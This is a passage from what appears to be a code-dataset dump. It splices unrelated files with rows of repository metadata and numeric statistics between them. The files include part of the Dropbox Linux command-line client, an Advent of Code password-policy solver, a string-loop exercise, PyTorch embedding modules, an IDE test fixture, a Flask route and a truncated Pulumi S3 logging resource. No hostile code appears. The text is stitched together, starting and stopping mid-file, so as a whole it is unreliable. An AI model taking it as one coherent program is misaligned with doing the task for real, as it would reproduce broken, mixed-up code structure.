console_print("Couldn't get public url: " + str(e))
except DropboxCommand.BadConnectionError:
console_print("Dropbox isn't responding!")
except DropboxCommand.EOFError:
console_print("Dropbox daemon stopped.")
except DropboxCommand.CouldntConnectError:
console_print("Dropbox isn't running!")
@command
@requires_dropbox_running
def sharelink(args):
"""get a shared link for a file in your Dropbox
dropbox sharelink FILE
Prints out a shared link for FILE.
"""
if len(args) != 1:
console_print(sharelink.__doc__, linebreak=False)
return
try:
with closing(DropboxCommand()) as dc:
try:
path = os.path.abspath(args[0])
link = dc.get_shared_link(path=path).get('link', ['No link'])[0]
console_print(link)
except DropboxCommand.CommandError as e:
console_print("Couldn't get shared link: " + str(e))
except DropboxCommand.BadConnectionError:
console_print("Dropbox isn't responding!")
except DropboxCommand.EOFError:
console_print("Dropbox daemon stopped.")
except DropboxCommand.CouldntConnectError:
console_print("Dropbox isn't running!")
@command
@requires_dropbox_running
def proxy(args):
"""set proxy settings for Dropbox
dropbox proxy MODE [TYPE] [HOST] [PORT] [USERNAME] [PASSWORD]
Set proxy settings for Dropbox.
MODE - one of "none", "auto", "manual"
TYPE - one of "http", "socks4", "socks5" (only valid with "manual" mode)
HOST - proxy hostname (only valid with "manual" mode)
PORT - proxy port (only valid with "manual" mode)
USERNAME - (optional) proxy username (only valid with "manual" mode)
PASSWORD - (optional) proxy password (only valid with "manual" mode)
"""
mode = None
type_ = None
if len(args) >= 1:
mode = args[0].lower()
if len(args) >= 2:
type_ = args[1].lower()
if (len(args) == 0 or
mode not in ['none', 'auto', 'manual'] or
(mode == 'manual' and len(args) not in (4, 6)) or
(mode != 'manual' and len(args) != 1) or
(mode == 'manual' and type_ not in ['http', 'socks4', 'socks5'])):
# Print help
console_print(proxy.__doc__, linebreak=False)
return
ARGS = ['mode', 'type', 'host', 'port', 'username', 'password']
# Load the args into a dictionary
kwargs = dict(zip(ARGS, args))
# Re-set these two because they were coerced to lower case
kwargs['mode'] = mode
if type_:
kwargs['type'] = type_
try:
with closing(DropboxCommand()) as dc:
try:
dc.set_proxy_settings(**kwargs)
console_print('set')
except DropboxCommand.CommandError as e:
console_print("Couldn't set proxy: " + str(e))
except DropboxCommand.BadConnectionError:
console_print("Dropbox isn't responding!")
except DropboxCommand.EOFError:
console_print("Dropbox daemon stopped.")
except DropboxCommand.CouldntConnectError:
console_print("Dropbox isn't running!")
@command
@requires_dropbox_running
def throttle(args):
"""set bandwidth limits for Dropbox
dropbox throttle DOWNLOAD UPLOAD
Set bandwidth limits for file sync.
DOWNLOAD - either "unlimited" or a manual limit in KB/s
UPLOAD - one of "unlimited", "auto", or a manual limit in KB/s
"""
if len(args) != 2:
console_print(throttle.__doc__, linebreak=False)
return
downlimit = args[0].lower()
uplimit = args[1].lower()
download_limit = None
download_mode = None
if downlimit == 'unlimited':
download_mode = downlimit
else:
try:
download_limit = int(downlimit)
download_mode = 'manual'
except ValueError:
console_print(throttle.__doc__, linebreak=False)
return
upload_limit = None
upload_mode = None
if uplimit in ['unlimited', 'auto']:
upload_mode = uplimit
else:
try:
upload_limit = int(uplimit)
upload_mode = 'manual'
except ValueError:
console_print(throttle.__doc__, linebreak=False)
return
kwargs = {
'download_mode': download_mode,
'upload_mode': upload_mode,
}
if download_limit:
kwargs['download_limit'] = str(download_limit)
if upload_limit:
kwargs['upload_limit'] = str(upload_limit)
try:
with closing(DropboxCommand()) as dc:
try:
dc.set_bandwidth_limits(**kwargs)
console_print('set')
except DropboxCommand.CommandError as e:
console_print("Couldn't set bandwidth limits: " + str(e))
except DropboxCommand.BadConnectionError:
console_print("Dropbox isn't responding!")
except DropboxCommand.EOFError:
console_print("Dropbox daemon stopped.")
except DropboxCommand.CouldntConnectError:
console_print("Dropbox isn't running!")
@command
@requires_dropbox_running
def status(args):
"""get current status of the dropboxd
dropbox status
Prints out the current status of the Dropbox daemon.
"""
if len(args) != 0:
console_print(status.__doc__,linebreak=False)
return
try:
with closing(DropboxCommand()) as dc:
try:
lines = dc.get_dropbox_status()['status']
if len(lines) == 0:
console_print('Idle')
else:
for line in lines:
console_print(line)
grab_link_url_if_necessary()
except KeyError:
console_print("Couldn't get status: daemon isn't responding")
except DropboxCommand.CommandError as e:
console_print("Couldn't get status: " + str(e))
except DropboxCommand.BadConnectionError:
console_print("Dropbox isn't responding!")
except DropboxCommand.EOFError:
console_print("Dropbox daemon stopped.")
except DropboxCommand.CouldntConnectError:
console_print("Dropbox isn't running!")
@command
def running(argv):
"""return whether Dropbox is running
dropbox running
Returns 1 if running, and 0 if not running.
"""
return int(is_dropbox_running())
@command
@requires_dropbox_running
def stop(args):
"""stop dropboxd
dropbox stop
Stops the Dropbox daemon.
"""
try:
with closing(DropboxCommand()) as dc:
try:
dc.tray_action_hard_exit()
except DropboxCommand.BadConnectionError:
console_print("Dropbox isn't responding!")
except DropboxCommand.EOFError:
console_print("Dropbox daemon stopped.")
except DropboxCommand.CouldntConnectError:
console_print("Dropbox isn't running!")
#returns true if link is necessary
def grab_link_url_if_necessary():
try:
with closing(DropboxCommand()) as dc:
try:
link_url = dc.needs_link().get("link_url", None)
if link_url is not None:
console_print("To link this computer to a Dropbox account, visit the following url:\n%s" % link_url[0])
return True
else:
return False
except DropboxCommand.CommandError:
pass
except DropboxCommand.BadConnectionError:
console_print("Dropbox isn't responding!")
except DropboxCommand.EOFError:
console_print("Dropbox daemon stopped.")
except DropboxCommand.CouldntConnectError:
console_print("Dropbox isn't running!")
@command
@requires_dropbox_running
def lansync(argv):
"""enables or disables LAN sync
dropbox lansync [y/n]
options:
y Dropbox will use LAN sync (default)
n Dropbox will not use LAN sync
"""
if len(argv) != 1:
console_print(lansync.__doc__, linebreak=False)
return
s = argv[0].lower()
if s.startswith('y') or s.startswith('-y'):
should_lansync = True
elif s.startswith('n') or s.startswith('-n'):
should_lansync = False
else:
should_lansync = None
if should_lansync is None:
console_print(lansync.__doc__,linebreak=False)
else:
with closing(DropboxCommand()) as dc:
dc.set_lan_sync(lansync='enabled' if should_lansync else 'disabled')
@command
@requires_dropbox_running
def exclude(args):
"""ignores/excludes a directory from syncing
dropbox exclude [list]
dropbox exclude add [DIRECTORY] [DIRECTORY] ...
dropbox exclude remove [DIRECTORY] [DIRECTORY] ...
"list" prints a list of directories currently excluded from syncing.
"add" adds one or more directories to the exclusion list, then
resynchronizes Dropbox.
"remove" removes one or more directories from the exclusion list, then
resynchronizes Dropbox.
With no arguments, executes "list".
Any specified path must be within Dropbox.
"""
if len(args) == 0:
try:
with closing(DropboxCommand()) as dc:
try:
lines = [relpath(path) for path in dc.get_ignore_set()['ignore_set']]
lines.sort()
if len(lines) == 0:
console_print('No directories are being ignored.')
else:
console_print('Excluded: ')
for line in lines:
console_print(str(line))
except KeyError:
console_print("Couldn't get ignore set: daemon isn't responding")
except DropboxCommand.CommandError as e:
if e.args[0].startswith("No command exists by that name"):
console_print("This version of the client does not support this command.")
else:
console_print("Couldn't get ignore set: " + str(e))
except DropboxCommand.BadConnectionError:
console_print("Dropbox isn't responding!")
except DropboxCommand.EOFError:
console_print("Dropbox daemon stopped.")
except DropboxCommand.CouldntConnectError:
console_print("Dropbox isn't running!")
elif len(args) == 1 and args[0] == "list":
exclude([])
elif len(args) >= 2:
sub_command = args[0]
paths = args[1:]
absolute_paths = [os.path.abspath(path) for path in paths]
if sub_command == "add":
try:
with closing(DropboxCommand(timeout=None)) as dc:
try:
result = dc.ignore_set_add(paths=absolute_paths)
if result["ignored"]:
console_print("Excluded: ")
lines = [relpath(path) for path in result["ignored"]]
for line in lines:
console_print(str(line))
except KeyError:
console_print("Couldn't add ignore path: daemon isn't responding")
except DropboxCommand.CommandError as e:
if e.args[0].startswith("No command exists by that name"):
console_print("This version of the client does not support this command.")
else:
console_print("Couldn't get ignore set: " + str(e))
except DropboxCommand.BadConnectionError as e:
console_print("Dropbox isn't responding! [%s]" % e)
except DropboxCommand.EOFError:
console_print("Dropbox daemon stopped.")
except DropboxCommand.CouldntConnectError:
console_print("Dropbox isn't running!")
elif sub_command == "remove":
try:
with closing(DropboxCommand(timeout=None)) as dc:
try:
result = dc.ignore_set_remove(paths=absolute_paths)
if result["removed"]:
console_print("No longer excluded: ")
lines = [relpath(path) for path in result["removed"]]
for line in lines:
console_print(str(line))
except KeyError:
console_print("Couldn't remove ignore path: daemon isn't responding")
except DropboxCommand.CommandError as e:
if e.args[0].startswith("No command exists by that name"):
console_print("This version of the client does not support this command.")
else:
console_print("Couldn't get ignore set: " + str(e))
except DropboxCommand.BadConnectionError as e:
console_print("Dropbox isn't responding! [%s]" % e)
except DropboxCommand.EOFError:
console_print("Dropbox daemon stopped.")
except DropboxCommand.CouldntConnectError:
console_print("Dropbox isn't running!")
else:
console_print(exclude.__doc__, linebreak=False)
return
else:
console_print(exclude.__doc__, linebreak=False)
return
@command
def start(argv):
"""start dropboxd
dropbox start [-i]
Starts the Dropbox daemon, dropboxd. If dropboxd is already running,
this will do nothing.
options:
-i --install auto install dropboxd if not available on the system
"""
should_install = "-i" in argv or "--install" in argv
# first check if dropbox is already running
if is_dropbox_running():
if not grab_link_url_if_necessary():
console_print("Dropbox is already running!")
return
console_print("Starting Dropbox...", linebreak=False)
console_flush()
if not start_dropbox():
if not should_install:
console_print()
console_print("The Dropbox daemon is not installed!")
console_print("Run \"dropbox start -i\" to install the daemon")
return
# install dropbox!!!
try:
download()
except:
traceback.print_exc()
else:
if GUI_AVAILABLE:
start_dropbox()
console_print("Done!")
else:
if start_dropbox():
if not grab_link_url_if_necessary():
console_print("Done!")
else:
if not grab_link_url_if_necessary():
console_print("Done!")
def can_reroll_autostart():
return ".config" in os.listdir(os.path.expanduser('~'))
def reroll_autostart(should_autostart):
home_dir = os.path.expanduser('~')
contents = os.listdir(home_dir)
# UBUNTU
if ".config" in contents:
autostart_dir = os.path.join(home_dir, ".config", "autostart")
autostart_link = os.path.join(autostart_dir, "dropbox.desktop")
if should_autostart:
if os.path.exists(DESKTOP_FILE):
if not os.path.exists(autostart_dir):
os.makedirs(autostart_dir)
shutil.copyfile(DESKTOP_FILE, autostart_link)
elif os.path.exists(autostart_link):
os.remove(autostart_link)
@command
def autostart(argv):
"""automatically start Dropbox at login
dropbox autostart [y/n]
options:
n Dropbox will not start automatically at login
y Dropbox will start automatically at login (default)
Note: May only work on current Ubuntu distributions.
"""
if len(argv) != 1:
console_print(''.join(autostart.__doc__.split('\n', 1)[1:]))
return
s = argv[0].lower()
if s.startswith('y') or s.startswith('-y'):
should_autostart = True
elif s.startswith('n') or s.startswith('-n'):
should_autostart = False
else:
should_autostart = None
if should_autostart is None:
console_print(autostart.__doc__,linebreak=False)
else:
reroll_autostart(should_autostart)
@command
def version(argv):
"""print version information for Dropbox
dropbox version
Prints the version information for the Dropbox proprietary daemon, if
it's installed, and the Dropbox command-line interface.
"""
dropbox_daemon_version = "Not installed"
try:
with open(os.path.join(DROPBOX_DIST_PATH, 'VERSION')) as f:
dropbox_daemon_version = f.read().strip()
except OSError:
pass
console_print("Dropbox daemon version: %s" % dropbox_daemon_version)
console_print("Dropbox command-line interface version: 2020.03.04")
@command
def help(argv):
"""provide help
dropbox help [COMMAND]
With no arguments, print a list of commands and a short description of
each. With a command, print descriptive help on how to use the
command.
"""
if not argv:
return usage()
for command in commands:
if command == argv[0]:
console_print(commands[command].__doc__.split('\n', 1)[1].strip())
return
for alias in aliases:
if alias == argv[0]:
console_print(aliases[alias].__doc__.split('\n', 1)[1].strip())
return
console_print("unknown command '%s'" % argv[0], f=sys.stderr)
def usage():
console_print("Dropbox command-line interface\n")
console_print("commands:\n")
console_print("Note: use dropbox help <command> to view usage for a specific command.\n")
out = []
for command in commands:
out.append((command, commands[command].__doc__.splitlines()[0]))
out.sort(key=lambda x: x[0])
spacing = max(len(o[0])+3 for o in out)
for o in out:
console_print(" %-*s%s" % (spacing, o[0], o[1]))
def main(argv):
global commands
# now we need to find out if one of the commands are in the
# argv list, and if so split the list at the point to
# separate the argv list at that point
cut = None
for i in range(len(argv)):
if argv[i] in commands or argv[i] in aliases:
cut = i
break
if cut == None:
usage()
os._exit(0)
return
# lol no options for now
globaloptionparser = optparse.OptionParser()
globaloptionparser.parse_args(argv[0:i])
# now dispatch and run
result = None
if argv[i] in commands:
result = commands[argv[i]](argv[i+1:])
elif argv[i] in aliases:
result = aliases[argv[i]](argv[i+1:])
# flush, in case output is rerouted to a file.
console_flush()
# done
return result
if __name__ == "__main__":
ret = main(sys.argv)
if ret is not None:
sys.exit(ret)
| 74.523039
| 59,849
| 0.664884
| 21,505
| 119,684
| 3.659707
| 0.04585
| 0.711901
| 1.054814
| 1.389037
| 0.72974
| 0.701621
| 0.688839
| 0.681914
| 0.670911
| 0.665828
| 0
| 0.236253
| 0.1614
| 119,684
| 1,605
| 59,850
| 74.56947
| 0.547889
| 0.046506
| 0
| 0.375723
| 0
| 0.004955
| 0.603979
| 0.563992
| 0
| 1
| 0
| 0.000623
| 0.001652
| 1
| 0.065235
| false
| 0.007432
| 0.032205
| 0.002477
| 0.151941
| 0.10322
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
90e844bc8b74ebc75eebf80641615c08f5f4b118
| 878
|
py
|
Python
|
day2AB.py
|
jjayala1/adventofCode2020
|
d5587fd812368d2ff24f215d904ddf258dd0a4a8
|
[
"MIT"
] | null | null | null |
day2AB.py
|
jjayala1/adventofCode2020
|
d5587fd812368d2ff24f215d904ddf258dd0a4a8
|
[
"MIT"
] | null | null | null |
day2AB.py
|
jjayala1/adventofCode2020
|
d5587fd812368d2ff24f215d904ddf258dd0a4a8
|
[
"MIT"
] | null | null | null |
#Part 1
f = open('day2.txt','r')
i=0
for line in f:
minmax, letter, password = line.split()
min,max = minmax.split('-')
letter = letter.split(':')[0]
if letter in password:
if int(min) <= password.count(letter) <= int(max):
i+=1
#print(f'{i} -- {min} -- {max} --- {letter} --- {password}' )
print(f'Valid passwords {i}')
f.close()
#Part 2
f = open('day2.txt','r')
i=0
for line in f:
minmax, letter, password = line.split()
min,max = minmax.split('-')
min = int(min)
max = int(max)
letter = letter.split(':')[0]
if letter in password:
if (password[min-1] == letter and password[max-1] != letter) or (password[min-1] != letter and password[max-1] == letter):
i+=1
#print(f'{i} -- {min} -- {max} --- {letter} --- {password}' )
print(f'Valid passwords {i}')
f.close()
| 22.512821
| 130
| 0.534169
| 126
| 878
| 3.722222
| 0.222222
| 0.063966
| 0.03838
| 0.051173
| 0.869936
| 0.869936
| 0.869936
| 0.869936
| 0.869936
| 0.541578
| 0
| 0.021341
| 0.252847
| 878
| 38
| 131
| 23.105263
| 0.693598
| 0.150342
| 0
| 0.833333
| 0
| 0
| 0.081081
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.333333
| 0
| 0
| 0
| 0.083333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
295eefe6eb622fb45dea9f2046580257a14c03a8
| 1,856
|
py
|
Python
|
Module1/Day13/module1_day13_continueBreak.py
|
sydneybeal/100DaysPython
|
d1b004bd27a0644983f3af100172f394ee039f30
|
[
"MIT"
] | 2
|
2019-06-02T12:17:18.000Z
|
2019-07-12T16:55:55.000Z
|
Module1/Day13/module1_day13_continueBreak.py
|
sydneybeal/100DaysPython
|
d1b004bd27a0644983f3af100172f394ee039f30
|
[
"MIT"
] | null | null | null |
Module1/Day13/module1_day13_continueBreak.py
|
sydneybeal/100DaysPython
|
d1b004bd27a0644983f3af100172f394ee039f30
|
[
"MIT"
] | null | null | null |
"""
Author: <REPLACE>
Project: 100DaysPython
File: module1_day13_continueBreak.py
Creation Date: <REPLACE>
Description: <REPLACE>
"""
motivation = "Over? Did you say 'over'? Nothing is over until we decide it is! Was it over when the Germans bombed " \
"Pearl Harbor? Hell no! And it ain't over now. 'Cause when the goin' gets tough...the tough get goin'! " \
"Who's with me? Let's go!"
output = ""
for letter in motivation:
if letter.lower() in 'bcdfghjklmnpqrstvwxyz':
output += letter
print(output)
motivation = "Over? Did you say 'over'? Nothing is over until we decide it is! Was it over when the Germans bombed " \
"Pearl Harbor? Hell no! And it ain't over now. 'Cause when the goin' gets tough...the tough get goin'! " \
"Who's with me? Let's go!"
output = ""
for letter in motivation:
if letter.lower() not in 'bcdfghjklmnpqrstvwxyz':
continue
else:
output += letter
print(output)
motivation = "Over? Did you say 'over'? Nothing is over until we decide it is! Was it over when the Germans bombed " \
"Pearl Harbor? Hell no! And it ain't over now. 'Cause when the goin' gets tough...the tough get goin'! " \
"Who's with me? Let's go!"
output = ""
for letter in motivation:
if letter.lower() in 'abcdefghijklmnopqrstuvwxyz':
output += letter
else:
break
print(output)
motivation = "Over? Did you say 'over'? Nothing is over until we decide it is! Was it over when the Germans bombed " \
"Pearl Harbor? Hell no! And it ain't over now. 'Cause when the goin' gets tough...the tough get goin'! " \
"Who's with me? Let's go!"
output = ""
for letter in motivation:
if letter.lower() in 'bcdfghjklmnpqrstvwxyz':
output += letter
print(output)
| 36.392157
| 119
| 0.633621
| 267
| 1,856
| 4.397004
| 0.224719
| 0.0477
| 0.057922
| 0.068143
| 0.841567
| 0.841567
| 0.841567
| 0.841567
| 0.841567
| 0.841567
| 0
| 0.004386
| 0.262931
| 1,856
| 50
| 120
| 37.12
| 0.853801
| 0.082974
| 0
| 0.888889
| 0
| 0.222222
| 0.595935
| 0.053198
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.111111
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
297cbc8c5ae5327359e872ec6a41a2c56887f5a0
| 154
|
py
|
Python
|
b3book/__init__.py
|
efbrasil/b3book
|
27cf6cb4527adba532010ebf1213132a99365932
|
[
"MIT"
] | null | null | null |
b3book/__init__.py
|
efbrasil/b3book
|
27cf6cb4527adba532010ebf1213132a99365932
|
[
"MIT"
] | null | null | null |
b3book/__init__.py
|
efbrasil/b3book
|
27cf6cb4527adba532010ebf1213132a99365932
|
[
"MIT"
] | null | null | null |
# from .data_classes import DBOrder, B3Order
# from .functions import read_orders_from_plain_files
from .lob import LOB
from .functions import plot_book
| 25.666667
| 53
| 0.824675
| 23
| 154
| 5.26087
| 0.608696
| 0.214876
| 0.31405
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007463
| 0.12987
| 154
| 5
| 54
| 30.8
| 0.895522
| 0.61039
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
297db9c207342bf45ca08cd87808389d0abd0c48
| 1,863
|
py
|
Python
|
modules/info_embedding.py
|
aliang-rec/Code-for-MAMO
|
fb488e885d3a0cfe510d31ca714117e02aa66c4e
|
[
"Apache-2.0"
] | null | null | null |
modules/info_embedding.py
|
aliang-rec/Code-for-MAMO
|
fb488e885d3a0cfe510d31ca714117e02aa66c4e
|
[
"Apache-2.0"
] | null | null | null |
modules/info_embedding.py
|
aliang-rec/Code-for-MAMO
|
fb488e885d3a0cfe510d31ca714117e02aa66c4e
|
[
"Apache-2.0"
] | null | null | null |
from utils import *
# ======================Embedding=========================
# item embedding
class ItemEmbedding(torch.nn.Module):
def __init__(self, n_layer, in_dim, embedding_dim, activation='sigmoid'):
super(ItemEmbedding, self).__init__()
self.input_size = in_dim
fcs = []
last_size = self.input_size
hid_dim = int(self.input_size/2)
for i in range(n_layer - 1):
linear_model = torch.nn.Linear(last_size, hid_dim)
linear_model.bias.data.fill_(0.0)
fcs.append(linear_model)
last_size = hid_dim
fcs.append(activation_func(activation))
self.fc = torch.nn.Sequential(*fcs)
finals = [torch.nn.Linear(last_size, embedding_dim), activation_func(activation)]
self.final_layer = torch.nn.Sequential(*finals)
def forward(self, x):
x = self.fc(x)
out = self.final_layer(x)
return out
# user embedding
class UserEmbedding(torch.nn.Module):
def __init__(self, n_layer, in_dim, embedding_dim, activation='sigmoid'):
super(UserEmbedding, self).__init__()
self.input_size = in_dim
fcs = []
last_size = self.input_size
hid_dim = int(self.input_size / 2)
for i in range(n_layer - 1): # 全连接层
linear_model = torch.nn.Linear(last_size, hid_dim)
linear_model.bias.data.fill_(0.0)
fcs.append(linear_model)
last_size = hid_dim
fcs.append(activation_func(activation))
self.fc = torch.nn.Sequential(*fcs)
finals = [torch.nn.Linear(last_size, embedding_dim), activation_func(activation)]
self.final_layer = torch.nn.Sequential(*finals)
def forward(self, x):
x = self.fc(x)
out = self.final_layer(x)
return out
| 31.576271
| 89
| 0.596887
| 235
| 1,863
| 4.459574
| 0.212766
| 0.066794
| 0.074427
| 0.064886
| 0.889313
| 0.889313
| 0.889313
| 0.889313
| 0.889313
| 0.889313
| 0
| 0.005908
| 0.273215
| 1,863
| 58
| 90
| 32.12069
| 0.768095
| 0.048846
| 0
| 0.878049
| 0
| 0
| 0.007923
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.097561
| false
| 0
| 0.02439
| 0
| 0.219512
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4621cf9ca941e0d9c8e2b3306844bb8f20efaa75
| 279
|
py
|
Python
|
python/testData/inspections/PyTypeCheckerInspection/MapArgumentsInOppositeOrderPy3.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2018-12-29T09:53:39.000Z
|
2018-12-29T09:53:42.000Z
|
python/testData/inspections/PyTypeCheckerInspection/MapArgumentsInOppositeOrderPy3.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/inspections/PyTypeCheckerInspection/MapArgumentsInOppositeOrderPy3.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
map(<weak_warning descr="Expected type '(Any) -> Any' (matched generic type '(_T1) -> _S'), got 'str' instead">'foo'</weak_warning>, <weak_warning descr="Expected type 'Iterable' (matched generic type 'Iterable[_T1]'), got '(c: Any) -> int' instead">lambda c: 42</weak_warning>)
| 139.5
| 278
| 0.691756
| 40
| 279
| 4.65
| 0.5
| 0.236559
| 0.172043
| 0.258065
| 0.301075
| 0
| 0
| 0
| 0
| 0
| 0
| 0.016129
| 0.111111
| 279
| 1
| 279
| 279
| 0.733871
| 0
| 0
| 0
| 0
| 2
| 0.648746
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4661b0d7639649e58c11a200d32e25c4cd348f53
| 140
|
py
|
Python
|
flask/app/info/routes.py
|
BlackAndWhiteData/Dash_Course
|
3a45f20c75416b6e4403094221e6c2171a5f00de
|
[
"MIT"
] | null | null | null |
flask/app/info/routes.py
|
BlackAndWhiteData/Dash_Course
|
3a45f20c75416b6e4403094221e6c2171a5f00de
|
[
"MIT"
] | null | null | null |
flask/app/info/routes.py
|
BlackAndWhiteData/Dash_Course
|
3a45f20c75416b6e4403094221e6c2171a5f00de
|
[
"MIT"
] | null | null | null |
from . import blueprint
from flask import render_template
@blueprint.route('/')
def index():
return render_template('index_info.html')
| 20
| 45
| 0.757143
| 18
| 140
| 5.722222
| 0.666667
| 0.271845
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.128571
| 140
| 7
| 45
| 20
| 0.844262
| 0
| 0
| 0
| 0
| 0
| 0.113475
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0.2
| 0.8
| 0.4
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
d3b9474e0c23d2944af86fa88de5b88952854ce1
| 180
|
py
|
Python
|
py/pyglass/pyglass/sketch/__init__.py
|
bengsquared/manila
|
0cbb50781d925558508990b51ec5f78c6bee1972
|
[
"MIT"
] | 2
|
2015-01-02T07:15:07.000Z
|
2015-04-15T05:23:59.000Z
|
py/pyglass/pyglass/sketch/__init__.py
|
bengsquared/manila
|
0cbb50781d925558508990b51ec5f78c6bee1972
|
[
"MIT"
] | 2
|
2020-11-04T05:49:26.000Z
|
2021-03-13T21:05:36.000Z
|
py/pyglass/pyglass/sketch/__init__.py
|
bengsquared/manila
|
0cbb50781d925558508990b51ec5f78c6bee1972
|
[
"MIT"
] | 2
|
2020-11-03T00:48:06.000Z
|
2021-03-12T00:14:07.000Z
|
# -*- coding: utf-8 -*-
from .api import list_slices, list_artboards, list_pages
from .api import slices, artboards, pages
from .api import preview
from .api import is_sketchfile
| 25.714286
| 56
| 0.761111
| 27
| 180
| 4.925926
| 0.481481
| 0.210526
| 0.390977
| 0.270677
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006494
| 0.144444
| 180
| 6
| 57
| 30
| 0.857143
| 0.116667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
3108021821fbf654c2d58f3163dfc3b23216889e
| 17,543
|
py
|
Python
|
sdk/python/pulumi_aws/s3/bucket_logging_v2.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/s3/bucket_logging_v2.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/s3/bucket_logging_v2.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['BucketLoggingV2Args', 'BucketLoggingV2']
@pulumi.input_type
class BucketLoggingV2Args:
def __init__(__self__, *,
bucket: pulumi.Input[str],
target_bucket: pulumi.Input[str],
target_prefix: pulumi.Input[str],
expected_bucket_owner: Optional[pulumi.Input[str]] = None,
target_grants: Optional[pulumi.Input[Sequence[pulumi.Input['BucketLoggingV2TargetGrantArgs']]]] = None):
"""
The set of arguments for constructing a BucketLoggingV2 resource.
:param pulumi.Input[str] bucket: The name of the bucket.
:param pulumi.Input[str] target_bucket: The bucket where you want Amazon S3 to store server access logs.
:param pulumi.Input[str] target_prefix: A prefix for all log object keys.
:param pulumi.Input[str] expected_bucket_owner: The account ID of the expected bucket owner.
:param pulumi.Input[Sequence[pulumi.Input['BucketLoggingV2TargetGrantArgs']]] target_grants: Set of configuration blocks with information for granting permissions documented below.
"""
pulumi.set(__self__, "bucket", bucket)
pulumi.set(__self__, "target_bucket", target_bucket)
pulumi.set(__self__, "target_prefix", target_prefix)
if expected_bucket_owner is not None:
pulumi.set(__self__, "expected_bucket_owner", expected_bucket_owner)
if target_grants is not None:
pulumi.set(__self__, "target_grants", target_grants)
@property
@pulumi.getter
def bucket(self) -> pulumi.Input[str]:
"""
The name of the bucket.
"""
return pulumi.get(self, "bucket")
